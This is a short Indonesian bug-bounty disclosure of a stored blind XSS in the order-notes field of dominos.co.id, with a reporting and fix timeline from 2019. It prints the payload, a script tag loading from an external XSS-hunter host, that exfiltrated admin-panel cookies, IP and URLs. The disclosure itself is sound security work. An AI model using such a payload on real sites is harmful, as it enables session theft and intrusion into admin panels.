Hai, kali ini saya akan berbagi pengalaman penemuan bug XSS pada website dominos.co.id
bug tersebut terletak pada kolom pesan tambahan saat kita order,payload yang saya gunakan (test“><script src=https://dominos.xss.ht></script>) setelah selesai melakukan order 5menit kemudian xss tereksekusi dengan menampilkan cookie admin panel,ip,url vuln/login panel,user agent,dan cookies
Timeline Report
Report Bug pada ( 21 Jan 2019 )
Dominos : Respon Bug Valid ( 23 Jan 2019 ) & Fix ( 7 Feb 2019)